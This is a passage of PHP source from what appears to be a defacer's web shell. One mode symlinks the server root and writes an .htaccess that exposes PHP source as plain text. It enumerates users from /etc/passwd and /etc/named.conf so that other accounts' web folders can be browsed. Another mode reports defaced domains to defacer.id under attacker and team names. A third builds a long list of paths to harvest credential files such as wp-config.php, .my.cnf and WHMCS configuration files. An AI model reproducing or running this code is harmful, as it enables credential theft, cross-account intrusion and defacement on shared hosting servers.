  2325. }
  2326. elseif(!$read)
  2327. {
  2328. for($uid=0;$uid<1000;$uid++)
  2329. {
  2330. $ara = posix_getpwuid($uid);
  2331. if (!empty($ara))
  2332. {
  2333. while (list ($key, $val) = each($ara))
  2334. {
  2335. print "$val:";
  2336. }
  2337. print "\n";
  2338. }}}
  2339.  
  2340. flush();
  2341.  
  2342. echo "</textarea>
  2343. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
  2344. </form></center>";
  2345. }
  2346. }
  2347. }
  2348. elseif($_GET['do'] == 'symlink') {
  2349. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2350. $d0mains = @file("/etc/named.conf");
  2351. ##httaces
  2352. if($d0mains){
  2353. @mkdir("viewsm",0777);
  2354. @chdir("viewsm");
  2355. @exe("ln -s / root");
  2356. $file3 = 'Options Indexes FollowSymLinks
  2357. DirectoryIndex janchonx.htm
  2358. AddType text/plain .php
  2359. AddHandler text/plain .php
  2360. Satisfy Any';
  2361. $fp3 = fopen('.htaccess','w');
  2362. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2363. echo "
  2364. <table align=center border=1 style='width:60%;border-color:#333333;'>
  2365. <tr>
  2366. <td align=center><font size=2>S. No.</font></td>
  2367. <td align=center><font size=2>Domains</font></td>
  2368. <td align=center><font size=2>Users</font></td>
  2369. <td align=center><font size=2>Symlink</font></td>
  2370. </tr>";
  2371. $dcount = 1;
  2372. foreach($d0mains as $d0main){
  2373. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2374. flush();
  2375. if(strlen(trim($domains[1][0])) > 2){
  2376. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2377. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  2378. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  2379. <td>".$user['name']."</td>
  2380. <td><a href='$full/viewsm/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  2381. flush();
  2382. $dcount++;}}}
  2383. echo "</table>";
  2384. }else{
  2385. $TEST=@file('/etc/passwd');
  2386. if ($TEST){
  2387. @mkdir("viewsm",0777);
  2388. @chdir("viewsm");
  2389. exe("ln -s / root");
  2390. $file3 = 'Options Indexes FollowSymLinks
  2391. DirectoryIndex janchonx.htm
  2392. AddType text/plain .php
  2393. AddHandler text/plain .php
  2394. Satisfy Any';
  2395.  $fp3 = fopen('.htaccess','w');
  2396.  $fw3 = fwrite($fp3,$file3);
  2397.  @fclose($fp3);
  2398.  echo "
  2399.  <table align=center border=1><tr>
  2400.  <td align=center><font size=3>S. No.</font></td>
  2401.  <td align=center><font size=3>Users</font></td>
  2402.  <td align=center><font size=3>Symlink</font></td></tr>";
  2403.  $dcount = 1;
  2404.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  2405.  while(!feof($file)){
  2406.  $s = fgets($file);
  2407.  $matches = array();
  2408.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2409.  $matches = str_replace("home/","",$matches[1]);
  2410.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2411.  continue;
  2412.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2413.  <td align=center><font class=txt>" . $matches . "</td>";
  2414.  echo "<td align=center><font class=txt><a href=$full/viewsm/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2415.  $dcount++;}fclose($file);
  2416.  echo "</table>";}else{if($os != "Windows"){@mkdir("viewsm",0777);@chdir("viewsm");@exe("ln -s / root");$file3 = '
  2417.  Options Indexes FollowSymLinks
  2418. DirectoryIndex janchonx.htm
  2419. AddType text/plain .php
  2420. AddHandler text/plain .php
  2421. Satisfy Any
  2422. ';
  2423.  $fp3 = fopen('.htaccess','w');
  2424.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2425.  echo "
  2426.  <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  2427.  <table align=center border=1><tr>
  2428.  <td align=center><font size=3>ID</font></td>
  2429.  <td align=center><font size=3>Users</font></td>
  2430.  <td align=center><font size=3>Symlink</font></td></tr>";
  2431.  $temp = "";$val1 = 0;$val2 = 1000;
  2432.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  2433.  if ($uid)$temp .= join(':',$uid)."\n";}
  2434.  echo '<br/>';$temp = trim($temp);$file5 =
  2435.  fopen("test.txt","w");
  2436.  fputs($file5,$temp);
  2437.  fclose($file5);$dcount = 1;$file =
  2438.  fopen("test.txt", "r") or exit("Unable to open file!");
  2439.  while(!feof($file)){$s = fgets($file);$matches = array();
  2440.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  2441.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2442.  continue;
  2443.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2444.  <td align=center><font class=txt>" . $matches . "</td>";
  2445.  echo "<td align=center><font class=txt><a href=$full/viewsm/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2446.  $dcount++;}
  2447.  fclose($file);
  2448.  echo "</table></div></center>";unlink("test.txt");
  2449.  } else
  2450.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  2451.  }
  2452.  }    
  2453. }
  2454. elseif($_GET['do'] == 'defacerid') {
  2455. echo "<center><form method='post'>
  2456.         <u>Defacer</u>: <br>
  2457.         <input type='text' name='hekel' size='50' value='Mr.ToKeiChun69'><br>
  2458.         <u>Team</u>: <br>
  2459.         <input type='text' name='tim' size='50' value='Extreme Crew'><br>
  2460.         <u>Domains</u>: <br>
  2461.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2462.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2463.         </form>";
  2464. $site = explode("\r\n", $_POST['sites']);
  2465. $go = $_POST['go'];
  2466. $hekel = $_POST['hekel'];
  2467. $tim = $_POST['tim'];
  2468. if($go) {
  2469. foreach($site as $sites) {
  2470. $zh = $sites;
  2471. $form_url = "https://www.defacer.id/notify";
  2472. $data_to_post = array();
  2473. $data_to_post['attacker'] = "$hekel";
  2474. $data_to_post['team'] = "$tim";
  2475. $data_to_post['poc'] = 'SQL Injection';
  2476. $data_to_post['url'] = "$zh";
  2477. $curl = curl_init();
  2478. curl_setopt($curl,CURLOPT_URL, $form_url);
  2479. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2480. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2481. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2482. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2483. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2484. $result = curl_exec($curl);
  2485. echo $result;
  2486. curl_close($curl);
  2487. echo "<br>";
  2488. }
  2489. }
  2490. }
  2491.  
  2492. elseif($_GET['do'] == 'config') {
  2493.     if($_POST){
  2494.         $passwd = $_POST['passwd'];
  2495.         mkdir("viewcg", 0777);
  2496.         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  2497.         $htc = fopen("viewcg/.htaccess","w");
  2498.         fwrite($htc, $isi_htc);
  2499.         preg_match_all('/(.*?):x:/', $passwd, $user_config);
  2500.         foreach($user_config[1] as $user_chonx) {
  2501.             $user_config_dir = "/home/$user_chonx/public_html/";
  2502.             if(is_readable($user_config_dir)) {
  2503.                 $grab_config = array(
  2504.                                         "/home/$user_chonx/.my.cnf" => "cpanel",
  2505.                     "/home/$user_chonx/.accesshash" => "WHM-accesshash",
  2506.                     "/home/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2507.                     "/home/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2508.                     "/home/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2509.                     "/home/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",               
  2510.                     "/home/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2511.                     "/home/$user_chonx/public_html/forum/config.php" => "phpBB",
  2512.                     "/home/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2513.                     "/home/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2514.                     "/home/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2515.                     "/home/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2516.                     "/home/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2517.                     "/home/$user_chonx/public_html/application/config/database.php" => "Ellislab",                 
  2518.                     "/home/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2519.                     "/home/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2520.                     "/home/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2521.                     "/home/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2522.                     "/home/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2523.                     "/home/$user_chonx/public_html/submitticket.php" => "WHMCS",                                       
  2524.                     "/home/$user_chonx/public_html/configuration.php" => "Joomla",                 
  2525.                     "/home/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2526.                     "/home/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2527.                     "/home/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",    
  2528.                     "/home/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2529.                     "/home/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2530.                     "/home/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2531.                     "/home/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2532.                     "/home/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2533.                     "/home/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2534.                     "/home/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2535.                     "/home/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2536.                     "/home/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2537.                     "/home/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2538.                     "/home/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2539.                     "/home/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2540.                     "/home/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2541.                     "/home/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2542.                     "/home/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2543.                     "/home/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2544.                     "/home/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2545.                     "/home/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2546.                     "/home/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2547.                     "/home/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2548.                     "/home/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2549.                     "/home/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2550.                     "/home/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2551.                     "/home/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2552.                     "/home/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2553.                     "/home/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2554.                     "/home/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2555.                     "/home/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2556.                     "/home/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2557.                     "/home/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2558.                     "/home/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2559.                     "/home/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2560.                     "/home/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",                
  2561.                     "/home/$user_chonx/public_html/wp-config.php" => "WordPress",
  2562.                     "/home/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2563.                     "/home/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2564.                     "/home/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",       
  2565.                     "/home/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2566.                     "/home/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2567.                     "/home/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2568.                     "/home/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2569.                     "/home/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2570.                     "/home/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2571.                     "/home/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
  2572.                     "/home/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2573.                     "/home/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2574.                     "/home/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2575.                     "/home/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2576.                     "/home/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2577.                     "/home/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2578.                     "/home/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2579.                     "/home/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2580.                     "/home/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2581.                     "/home/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2582.                     "/home/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2583.                     "/home/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2584.                     "/home/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2585.                     "/home/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2586.                     "/home/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2587.                     "/home/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2588.                     "/home/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2589.                     "/home/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2590.                     "/home/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2591.                     "/home/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2592.                     "/home/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2593.                     "/home/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2594.                     "/home/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2595.                     "/home/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2596.                     "/home/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2597.                     "/home/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
  2598.                                         "/home1/$user_chonx/.my.cnf" => "cpanel",
  2599.                     "/home1/$user_chonx/.accesshash" => "WHM-accesshash",
  2600.                     "/home1/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2601.                     "/home1/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2602.                     "/home1/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2603.                     "/home1/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",              
  2604.                     "/home1/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2605.                     "/home1/$user_chonx/public_html/forum/config.php" => "phpBB",
  2606.                     "/home1/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2607.                     "/home1/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2608.                     "/home1/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2609.                     "/home1/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2610.                     "/home1/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2611.                     "/home1/$user_chonx/public_html/application/config/database.php" => "Ellislab",                
  2612.                     "/home1/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2613.                     "/home1/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2614.                     "/home1/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2615.                     "/home1/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2616.                     "/home1/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2617.                     "/home1/$user_chonx/public_html/submitticket.php" => "WHMCS",                                      
  2618.                     "/home1/$user_chonx/public_html/configuration.php" => "Joomla",                
  2619.                     "/home1/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2620.                     "/home1/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2621.                     "/home1/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",       
  2622.                     "/home1/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2623.                     "/home1/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2624.                     "/home1/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2625.                     "/home1/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2626.                     "/home1/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2627.                     "/home1/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2628.                     "/home1/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2629.                     "/home1/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2630.                     "/home1/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2631.                     "/home1/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2632.                     "/home1/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2633.                     "/home1/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2634.                     "/home1/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2635.                     "/home1/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2636.                     "/home1/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2637.                     "/home1/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2638.                     "/home1/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2639.                     "/home1/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2640.                     "/home1/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2641.                     "/home1/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2642.                     "/home1/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2643.                     "/home1/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2644.                     "/home1/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2645.                     "/home1/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2646.                     "/home1/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2647.                     "/home1/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2648.                     "/home1/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2649.                     "/home1/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2650.                     "/home1/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2651.                     "/home1/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2652.                     "/home1/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2653.                     "/home1/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2654.                     "/home1/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",                   
  2655.                     "/home1/$user_chonx/public_html/wp-config.php" => "WordPress",
  2656.                     "/home1/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2657.                     "/home1/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2658.                     "/home1/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",      
  2659.                     "/home1/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2660.                     "/home1/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2661.                     "/home1/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2662.                     "/home1/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2663.                     "/home1/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2664.                     "/home1/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2665.                     "/home1/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
  2666.                     "/home1/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2667.                     "/home1/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2668.                     "/home1/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2669.                     "/home1/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2670.                     "/home1/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2671.                     "/home1/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2672.                     "/home1/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2673.                     "/home1/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2674.                     "/home1/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2675.                     "/home1/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2676.                     "/home1/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2677.                     "/home1/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2678.                     "/home1/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2679.                     "/home1/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2680.                     "/home1/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2681.                     "/home1/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2682.                     "/home1/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2683.                     "/home1/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2684.                     "/home1/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2685.                     "/home1/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2686.                     "/home1/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2687.                     "/home1/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2688.                     "/home1/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2689.                     "/home1/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2690.                     "/home1/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2691.                     "/home1/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal",
  2692.                                         "/home2/$user_chonx/.my.cnf" => "cpanel",
  2693.                     "/home2/$user_chonx/.accesshash" => "WHM-accesshash",
  2694.                     "/home2/$user_chonx/public_html/bw-configs/config.ini" => "BosWeb",
  2695.                     "/home2/$user_chonx/public_html/config/koneksi.php" => "Lokomedia",
  2696.                     "/home2/$user_chonx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2697.                     "/home2/$user_chonx/public_html/clientarea/configuration.php" => "WHMCS",              
  2698.                     "/home2/$user_chonx/public_html/whmcs/configuration.php" => "WHMCS",
  2699.                     "/home2/$user_chonx/public_html/forum/config.php" => "phpBB",
  2700.                     "/home2/$user_chonx/public_html/sites/default/settings.php" => "Drupal",
  2701.                     "/home2/$user_chonx/public_html/config/settings.inc.php" => "PrestaShop",
  2702.                     "/home2/$user_chonx/public_html/app/etc/local.xml" => "Magento",
  2703.                     "/home2/$user_chonx/public_html/admin/config.php" => "OpenCart",
  2704.                     "/home2/$user_chonx/public_html/slconfig.php" => "Sitelok",
  2705.                     "/home2/$user_chonx/public_html/application/config/database.php" => "Ellislab",                
  2706.                     "/home2/$user_chonx/public_html/whm/configuration.php" => "WHMCS",
  2707.                     "/home2/$user_chonx/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2708.                     "/home2/$user_chonx/public_html/central/configuration.php" => "WHM Central",
  2709.                     "/home2/$user_chonx/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2710.                     "/home2/$user_chonx/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2711.                     "/home2/$user_chonx/public_html/submitticket.php" => "WHMCS",                                      
  2712.                     "/home2/$user_chonx/public_html/configuration.php" => "Joomla",                
  2713.                     "/home2/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2714.                     "/home2/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2715.                     "/home2/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",       
  2716.                     "/home2/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2717.                     "/home2/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2718.                     "/home2/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2719.                     "/home2/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2720.                     "/home2/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2721.                     "/home2/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2722.                     "/home2/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2723.                     "/home2/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2724.                     "/home2/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2725.                     "/home2/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2726.                     "/home2/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2727.                     "/home2/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2728.                     "/home2/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2729.                     "/home2/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2730.                     "/home2/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2731.                     "/home2/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2732.                     "/home2/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2733.                     "/home2/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2734.                     "/home2/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2735.                     "/home2/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2736.                     "/home2/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2737.                     "/home2/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2738.                     "/home2/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2739.                     "/home2/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2740.                     "/home2/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2741.                     "/home2/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2742.                     "/home2/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2743.                     "/home2/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2744.                     "/home2/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2745.                     "/home2/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2746.                     "/home2/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2747.                     "/home2/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2748.                     "/home2/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",                   
  2749.                     "/home2/$user_chonx/public_html/wp-config.php" => "WordPress",
  2750.                     "/home2/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2751.                     "/home2/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2752.                     "/home2/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",      
  2753.                     "/home2/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2754.                     "/home2/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2755.                     "/home2/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2756.                     "/home2/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2757.                     "/home2/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2758.                     "/home2/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2759.                     "/home2/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
